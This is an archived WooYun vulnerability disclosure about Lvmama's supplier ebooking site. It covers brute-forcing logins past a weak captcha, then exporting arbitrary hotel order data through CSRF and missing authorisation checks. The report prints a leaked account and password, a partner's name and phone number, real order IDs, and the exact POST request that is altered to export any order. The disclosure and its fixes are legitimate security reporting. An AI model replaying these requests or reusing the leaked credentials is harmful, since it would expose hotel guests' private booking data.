乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-02: 细节已通知厂商并且等待厂商处理中 2016-05-03: 厂商已经确认,细节仅向厂商公开 2016-05-13: 细节向核心白帽子及相关领域专家公开 2016-05-23: 细节向普通白帽子公开 2016-06-02: 细节向实习白帽子公开 2016-06-17: 细节向公众公开
驴妈妈旅游网某业务系统从验证码绕过再到任意酒店数据导出(5.1你还敢开房吗?)
驴妈妈供应商管理系统
http://ebooking.lvmama.com/
#验证码可识别验证码说实话,确实太好识别了,关于验证码算法,之前有案例验证码太过于规则化,不具有复杂性、干扰性,色位差等原因
几乎可以达到%99.9的识别率,毫不夸张,在我发送2万次FUZZ当中只有少数无法识别在登录框并且有密码错误等提示
测试中长度为7041为正确帐号,返回正常内容
HTTP/1.1 200 OKContent-Language: zh-CNConnection: closeTransfer-Encoding: chunkedContent-Type: text/html;charset=UTF-8Date: Sun, 01 May 2016 12:03:19 GMTServer: nginx2<!DOCTYPE html><html><head><meta charset="utf-8"><title>驴妈妈供应商管理系统_首页</title><link rel="shortcut icon" type="image/x-icon" href="http://www.lvmama.com/favicon.ico"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="keywords" content="页面关键字"><meta name="description" content="页面描述"></head><body class="home"><script type="text/javascript" src="http://pic.lvmama.com/js/new_v/jquery-1.7.2.min.js"></script><script type="text/javascript" src="/vst_ebooking/js/lvmamajquery.js"></script><link href="http://pic.lvmama.com/min/index.php?f=/styles/v4/modules/calendar.css" type="text/css" rel="stylesheet"><link rel="stylesheet" href="http://pic.lvmama.com/min/index.php?f=/styles/v5/base.css,/styles/v5/common.css" ><link rel="stylesheet" href="http://pic.lvmama.com/min/index.php?f=/styles/v5/modules/dialog.css,/styles/v5/modules/table.css,/styles/v5/modules/arrow.css,/styles/v5/modules/form.css,/styles/v5/modules/button.css,/styles/v5/modules/paging.css,/styles/v5/modules/tip.css" ><!-- propage.css 项目页面样式 --><link rel="stylesheet" href="/vst_ebooking/css/base.css" ><link rel="stylesheet" href="/vst_ebooking/css/easyui.css" ><link rel="stylesheet" href="http://pic.lvmama.com/styles/v5/ebk.css"> <link rel="stylesheet" href="/vst_ebooking/css/contentManage/kindEditorConf.css" type="text/css"/> <script src="http://pic.lvmama.com/js/common/losc.js"></script><script src="http://pic.lvmama.com/js/common/losc.js"></script><script src="/vst_ebooking/js/My97DatePicker/WdatePicker.js"></script><script src="/vst_ebooking/js/notice.js"></script><!-- 公共头部开始 --><div class="header wrap clearfix"> <div style="display: none;" id="sessionUserName">zxy</div> <a class="logo">驴妈妈旅游网<span>ebooking测试用</span></a> <div class="adbox"></div> <div class="topinfo"> <p id="welcome">欢迎您,zxy <a href="/vst_ebooking/editPwd.do">修改密码</a> <i>|</i> <a href="/vst_ebooking/loginOut.do">退出</a></p> <p>合作方:zhouxinyuan 电话:15000480888</p> </div></div> <!--header end--><div class="enav wrap"> <ul class="enav-main clearfix"> <li class="nav-item" id="home"><a href="/vst_ebooking/index.do"><i class="icon icon-home"></i>首页</a></li> <li class="nav-item" id="route"><a href="/vst_ebooking/ebooking/prod/route/getRouteHome.do"><i class="icon icon-product"></i>度假线路</a></li> <li class="nav-item" id="ticket"><a href="/vst_ebooking/ebooking/ticket/pass/getTicketHome.do"><i class="icon icon-order"></i>门票</a></li> <li class="nav-item" id="hotel"><a href="/vst_ebooking/ebooking/prod/hotel/getHotelHome.do"><i class="icon icon-notice"></i>酒店</a></li> </ul> <div class="enav-nn"> <a href="/vst_ebooking/ebooking/announcement/announcementList.do">公告信息</a> <a href="/vst_ebooking/ebooking/user/findUserList.do">用户管理</a> <a id="smsConfig" href="/vst_ebooking/ebooking/sms/showSmsConfigList.do">短信提醒</a> <a href="/vst_ebooking/ebooking/advice/findEbkAdviceSubjectList.do">优化建议</a> <a href="/vst_ebooking/ebooking/manual/findEbkManualList.do">使用帮助</a> <a href="/vst_ebooking/ebooking/mobileversion/showMobileVersionPage.do">手机版</a> </div></div><!-- 公共头部结束 --><script>setInterval("autoRefreshService()",60000);function getNowFormatDate(date) { //var date = new Date(); var seperator1 = "-"; var seperator2 = ":"; var month = date.getMonth() + 1; var strDate = date.getDate(); if (month >= 1 && month <= 9) { month = "0" + month; } if (strDate >= 0 && strDate <= 9) { strDate = "0" + strDate; } var currentdate = date.getFullYear() + seperator1 + month + seperator1 + strDate + " " + date.getHours() + seperator2 + date.getMinutes() + seperator2 + date.getSeconds(); return new Date(currentdate);}function autoRefreshService(){ //如果cookie不为空并且与当前时间比大于20分钟 if(getCookie('ebkUser') != null && getNowFormatDate(new Date()).getTime()-new Date(getCookie('ebkUser')).getTime() > 1200000) { setCookie('ebkUser',getNowFormatDate(new Date())); $.ajax({ url : "/vst_ebooking/autoRefreshService.do?userName=zxy", type : "post", dataType:"JSON", data : $("#loginForm").serialize(), success : function(result) { } }); } else if(getCookie('ebkUser') == null) { setCookie('ebkUser',getNowFormatDate(new Date())); } };var forcedChangePwdDialog;$(function () { var $span = $("<span>"+ +"</span>"); var bShouldChangePwdFlag = $span.html(); if(!!bShouldChangePwdFlag) { forcedChangePwdDialog = new xDialog("/vst_ebooking/forcedToChangePwd.do",{}, {title:'修改密码',width:800, wrapClass:'forcedChangePwd'}); }});</script><div class="crumbs wrap"> <p class="crumbs-link"> <a href="#"><i class="icon icon-ihome"></i>首页</a> </p> <div class="index_remind">网页提醒:<span id="pageMessage" class="icon_guan"></span> 弹窗提醒:<span id="windowMessage" class="icon_guan"></span></div></div><!--//.crumbs--><div class="wrap"><!--侧边栏--><div class="aside"> <div class="nav-quick"> <h2>线路产品</h2> <ul class="clearfix"> <li> <span class="libg"></span> <i class="ui-arrow-right gray-ui-arrow-right"></i> <a href="/vst_ebooking/ebooking/prod/route/showSelectCategory.do">新增产品</a> </li> <li> <span class="libg"></span> <i class="ui-arrow-right gray-ui-arrow-right"></i> <a href="/vst_ebooking/ebooking/prod/route/audit/findProductAuditList.do?currentAuditStatus=noAuditStatus">产品管理</a> </li> <li> <span class="libg"></span> <i class="ui-arrow-right gray-ui-arrow-right"></i> <a href="/vst_ebooking/ebooking/route_certif/route/findComfirmRouteCertifOrderList.do?certifStatus=CREATE">订单处理</a> </li> <li> <span class="libg"></span> <i class="ui-arrow-right gray-ui-arrow-right"></i> <a href="/vst_ebooking/ebooking/prod/route/findProdOrdRouteList.do">数据管理</a> </li> </ul> <h2>门票产品</h2> <ul class="clearfix"> <li> <span class="libg"></span> <i class="ui-arrow-right gray-ui-arrow-right"></i> <a href="/vst_ebooking/ebooking/ticket/pass/findPassList.do">通关处理 </a> </li> <li> <span class="libg"></span> <i class="ui-arrow-right gray-ui-arrow-right"></i> <a href="/vst_ebooking/ebooking/ticket_certif/ticket/findComfirmTicketCertifOrderList.do?certifStatus=CREATE">订单处理 </a> </li> <li> <span class="libg"></span> <i class="ui-arrow-right gray-ui-arrow-right"></i> <a href="/vst_ebooking/ebooking/ticket/pass/findPassStatisList.do">数据管理 </a> </li> </ul> <h2>酒店产品</h2> <ul class="clearfix"> <li> <span class="libg"></span> <i class="ui-arrow-right gray-ui-arrow-right"></i> <a href="/vst_ebooking/ebooking/prod/hotel/findProductList.do">产品管理 </a> </li> <li> <span class="libg"></span> <i class="ui-arrow-right gray-ui-arrow-right"></i> <a href="/vst_ebooking/ebooking/super_task/hotel/findConfirmTaskList.do">订单处理 </a> </li> </ul> </div><!--//.nav-quick--></div><!--//.aside--> <div class="main"> <div class="main_box wrap"> <div class="hotel_info box_border"> <h3 class="box_title">待处理事项</h3> <ul class="hotel_info_box"> <li> <i class="icon_line"></i> <p>线路类</p> <a class="btn_dcl" href="/vst_ebooking/ebooking/route_certif/route/findComfirmRouteCertifOrderList.do?certifStatus=CREATE" target="_self">待处理订单<span>0</span>笔</a> </li> <li> <i class="icon_ticket"></i> <p>门票类</p> <a class="btn_dcl" href="/vst_ebooking/ebooking/ticket_certif/ticket/findComfirmTicketCertifOrderList.do?certifStatus=CREATE" target="_self">待处理订单<span>0</span>笔</a> </li> <li> <i class="icon_hotel"></i> <p>酒店类</p> <!-- 调中间表--> <a class="btn_dcl" href="/vst_ebooking/ebooking/order/hotel/findConfirmTaskList.do" target="_self">待处理订单<span>16</span>笔</a> </li> </ul> </div> <div class="gonggao_info box_border"> <h3 class="box_title"><a href="#">更多</a>公告</h3> <ul class="gonggao_list"> <li> <span>[2016-02-23]</span> <a href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(201)">关于产品推荐上传图片卡死的问题,请大家设置页面显示为100%</a> </li> <li> <span>[2016-02-14]</span> <a href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(181)">关于线路订单待处理任务的提醒(默认时间段为下单时间2个月内的订单)</a> </li> <li> <span>[2016-01-11]</span> <a href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(161)">上线公告:线路行程录入结构化(含跟团游,当地游,自由行,机+酒)</a> </li> <li> <span>[2016-01-08]</span> <a href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(141)">致歉:关于已开通短信帐号8点后未收到短信提醒</a> </li> <li> <span>[2016-01-07]</span> <a href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(121)">短信订单短信提醒时间自定义上线公告</a> </li> </ul> </div> </div> </div></div><!-- 通用底部 --><div class="telephone_box wrap"> <ul class="telephone_list h_162"> <li> <h5>财务结算部</h5> <p>电话:021-60561632<br>传真:021-69108791<br> 021-69108795</p> </li> <li> <h5>酒店预订部</h5> <p>电 话:021-60561631<br> 021-60568957<br> 021-60568957<br> 客服传真:021-69108791<br>业务传真:021-69108795</p> </li> <li> <h5>系统服务</h5> <p>电话:021-60561616<br> 转:3412</p> </li> </ul> <a class="btn_show" href="javascript:void(0)" target="_self"><i></i></a></div><p class="footer">24小时旅游预订电话(免长话费):10106060 客服邮箱:[email protected]<br>Copyright©2014 www.lvmama.com 景域旅游运营集团版权所有 沪ICP备07509677</p><!-- jQuery以及通用js --><script src="/vst_ebooking/js/pandora-dialog.js"></script><script src="/vst_ebooking/js/pandora-calendar.js"></script><script src="/vst_ebooking/js/pandora-ebk-calendar.js"></script><script src="/vst_ebooking/js/jquery.validate.min.js"></script><script src="/vst_ebooking/js/vst_validate.js"></script><script src="/vst_ebooking/js/messages_zh.js"></script><script src="/vst_ebooking/js/notice.js"></script><script src="/vst_ebooking/js/jquery.easyui.min-1.3.1.js"></script><script src="/vst_ebooking/js/jquery.validate.expand.js"></script><script src="/vst_ebooking/js/jquery.jsonSuggest-2.min.js"></script><script src="/vst_ebooking/js/vst_pet_util.js"></script><script src="/vst_ebooking/js/vst_util.js"></script><!-- 页面项目js及插件 --><script src="/vst_ebooking/js/lineRouteEbk.js"></script><script src="/vst_ebooking/js/ebk.js"></script><script src="/vst_ebooking/js/lvmama-dialog.js"></script><script src="/vst_ebooking/js/json2.js"></script><script></script></body></html>
得到几枚帐号,拿一枚权限稍微高一些的帐号进行演示
carrie 123456
#CSRF请求伪造订单无token之类验证,得到之前订单完全可遍历
orderId=25353960
要遍历最新的订单以及已处理、未处理的订单都是很轻松我注意到一个小细节,之前不知前人发现没有在导出门票或酒店数据,也没令牌会话保护
POST /vst_ebooking/ebooking/order/hotel/getXLSForHotelTaskList.do HTTP/1.1Host: ebooking.lvmama.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://ebooking.lvmama.com/vst_ebooking/ebooking/order/hotel/findAllTaskList.doContent-Length: 142Cookie: xxxxxConnection: closeorderId=28536196&visitBeginTime=&visitEndTime=&certifStatus=&orderCreateBeginTime=&orderCreateEndTime=&confirmUser=&travellerName=&certifType=
这里我就结合前面的订单遍历漏洞,直接修改订单参数值orderId即可导出任意酒店数据拿这个订单号,还是才开的房为例,导出时修改参数为订单号28536196
各种越权,各种CSRF,就到这里吧
1.增加会话令牌或token验证2.验证码尽量采用复杂性或干扰性强一点的3.在浏览订单或导出订单时做好权限的分配,尽量不要使用直接order等参数进行直接传值查询,可以使用特定标识或身份进行查询(跟条件1是一回儿事)
危害等级:高
漏洞Rank:15
确认时间:2016-05-03 09:35
thx
暂无